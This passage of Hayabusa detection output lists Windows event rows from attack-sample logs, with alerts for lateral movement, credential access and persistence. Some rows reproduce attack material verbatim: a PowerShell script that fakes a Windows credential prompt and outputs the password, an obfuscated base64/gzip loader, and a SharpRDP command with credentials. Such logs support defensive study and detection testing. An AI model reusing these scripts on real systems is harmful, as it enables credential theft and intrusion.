+00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:445 (MSEDGEWIN10) | Dst: 10.0.2.17:59767 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-01 12:04:22.908 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:62733 (MSEDGEWIN10) | Dst: 10.0.2.17:445 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-98DD-5D69-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/smb_bi_auth_conn_spoolsample.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49947 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 
(MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:07.207 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49947 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:56.358 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49948 (MSEDGEWIN10) | Dst: 127.0.0.1:3389 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 3008 | PGUID: 747F3D96-48A4-5D6E-0000-001072958000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:56.358 +00:00,MSEDGEWIN10,3,high,LatMov,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/net_connection_win_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:04:58.463 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:3389 (MSEDGEWIN10) | Dst: 127.0.0.1:49948 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 8 | PGUID: 
747F3D96-9874-5D6E-0000-0010C1C20000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:05:22.837 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:05:22.837 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:33:24.177 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49949 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:33:24.177 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49949 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:34:37.129 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49950 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | 
User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\inetsrv\w3wp.exe | PID: 8892 | PGUID: 747F3D96-4F81-5D6E-0000-001001818B00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:34:37.129 +00:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (MSEDGEWIN10) | Dst: 127.0.0.1:49950 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:36:26.005 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.0.2.15:137 (MSEDGEWIN10) | Dst: 10.255.255.255:137 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-03 11:36:26.005 +00:00,MSEDGEWIN10,3,info,,Network Connection,udp | Src: 10.255.255.255:137 () | Dst: 10.0.2.15:137 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-986D-5D6E-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx +2019-09-06 13:49:35.433 +00:00,MSEDGEWIN10,17,medium,,Pipe Created_Sysmon Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: c:\Users\IEUser\Desktop\kekeo.exe | PID: 6908 | PGUID: 747F3D96-393E-5D72-0000-0010AD443200,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 13:49:39.823 +00:00,MSEDGEWIN10,18,medium,,Pipe Connected_Sysmon 
Alert,CredAccess - Keko default np | Pipe: \kekeo_tsssp_endpoint | Process: C:\Users\IEUser\Desktop\kekeo.exe | PID: 7808 | PGUID: 747F3D96-3944-5D72-0000-001019773200,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-06 14:58:44.918 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3128 | PGUID: 747F3D96-7424-5D72-0000-0010BEFBBC00,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon17_18_kekeo_tsssp_default_np.evtx +2019-09-08 19:14:54.471 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Guest RID Hijack | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F5\F: Binary Data | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | PID: 7680 | PGUID: 747F3D96-067D-5D75-0000-001007745500,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx +2019-09-09 13:35:08.655 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:08.655 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object 
System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,medium,,Potentially Malicious PwSh,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,info,,PwSh Scriptblock Log,"function Invoke-LoginPrompt{ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Please enter user credentials"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) while($DS.ValidateCredentials(""$full"",""$password"") -ne $True){ $cred = $Host.ui.PromptForCredential(""Windows Security"", ""Invalid Credentials, Please try again"", ""$env:userdomain\$env:username"","""") $username = ""$env:username"" $domain = ""$env:userdomain"" $full = ""$domain"" + ""\"" + ""$username"" $password = $cred.GetNetworkCredential().password Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) $DS.ValidateCredentials(""$full"", ""$password"") | out-null } $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password $output R{START_PROCESS} } Invoke-LoginPrompt",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,high,CredAccess | Exec,PowerShell Credential Prompt,,rules/sigma/powershell/powershell_script/posh_ps_prompt_credentials.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 
+00:00,MSEDGEWIN10,4104,medium,Persis,Manipulation of User Computer or Group Security Principals Across AD,,rules/sigma/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-09 13:35:09.315 +00:00,MSEDGEWIN10,4104,low,Disc,Suspicious PowerShell Get Current User,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_get_current_user.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/phish_windows_credentials_powershell_scriptblockLog_4104.evtx +2019-09-22 11:22:05.201 +00:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3461203602-4096304019-2269080069-501 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-09-22 11:23:19.251 +00:00,MSEDGEWIN10,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-20 | Group: Administrators | LID: 0x27a10f,rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\sqlsvc | Parent Cmd: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS | LID: 0x1d51e | PID: 5004 | PGUID: 747F3D96-DB7C-5DBE-0000-0010CF6B9502",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,critical,InitAccess | Persis | PrivEsc,Suspicious 
Shells Spawn by SQL Server,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_sysmon/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-03 13:51:58.263 +00:00,MSEDGEWIN10,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx +2019-11-15 08:19:02.298 +00:00,alice.insecurebank.local,1102,high,Evas,Security Log Cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2019-11-15 08:19:17.134 +00:00,alice.insecurebank.local,4634,info,,Logoff,User: ANONYMOUS LOGON | LID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7a3aff | PID: 4180 | PGUID: 
747F3D96-2842-5E1E-0000-00100C417A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:50.353 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:51.016 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,FileProtocolHandler ms-browser:// | LID: 0x7a3aff | PID: 1568 | PGUID: 747F3D96-2842-5E1E-0000-0010745E7A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:44:51.122 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7a3aff | PID: 676 | PGUID: 747F3D96-2843-5E1E-0000-0010B1687A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 url.dll,OpenURL ms-browser:// | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7beb57 | PID: 3412 | PGUID: 
747F3D96-28B3-5E1E-0000-00101DF17B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.237 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.819 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 url.dll,OpenURL ms-browser:// | LID: 0x7beb57 | PID: 1656 | PGUID: 747F3D96-28B3-5E1E-0000-001032047C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:46:43.836 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7beb57 | PID: 2964 | PGUID: 747F3D96-28B3-5E1E-0000-0010900A7C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.044 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe /c start ms-browser:// | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7cef82 | PID: 4448 | PGUID: 
747F3D96-2910-5E1E-0000-001053F57C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.044 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.412 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""cmd.exe"" /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c start ms-browser:// | LID: 0x7cef82 | PID: 2416 | PGUID: 747F3D96-2911-5E1E-0000-0010D80A7D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:17.447 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""cmd.exe"" /c notepad.exe | LID: 0x7cef82 | PID: 1344 | PGUID: 747F3D96-2911-5E1E-0000-00109C137D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.243 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: explorer ms-browser:// | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x7d58cd | PID: 3828 | PGUID: 747F3D96-292D-5E1E-0000-0010F5597D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.243 +00:00,MSEDGEWIN10,1,high,Exec,Wmiprvse Spawning 
Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-14 20:48:45.293 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x565a6 | PID: 6020 | PGUID: 747F3D96-292D-5E1E-0000-001025607D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx +2020-01-23 19:09:34.052 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password | Process: C:\ProgramData\USOShared\SharpRDP.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xd50da8 | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.657 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.657 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\ProgramData\USOShared\AxInterop.MSTSCLib.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: SHA1=7E613165F4E4696AB13D8D5F3F889131EBC186E0,MD5=A482BE452F384E446FD9F3A91986FCD4,SHA256=9DDAE70F550B452ABE3C75A6036845ABD4134F858C1DEC3343762D97A9CF8450,IMPHASH=DAE02F32A21E03CE65412F6E56942DAA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx +2020-01-23 19:09:34.660 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"LM - suspicious RDP Client | Image: C:\Windows\SysWOW64\mstscax.dll | Process: C:\ProgramData\USOShared\SharpRDP.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 5484 | PGUID: 747F3D96-EF6D-5E29-0000-0010A243F100 | Hash: 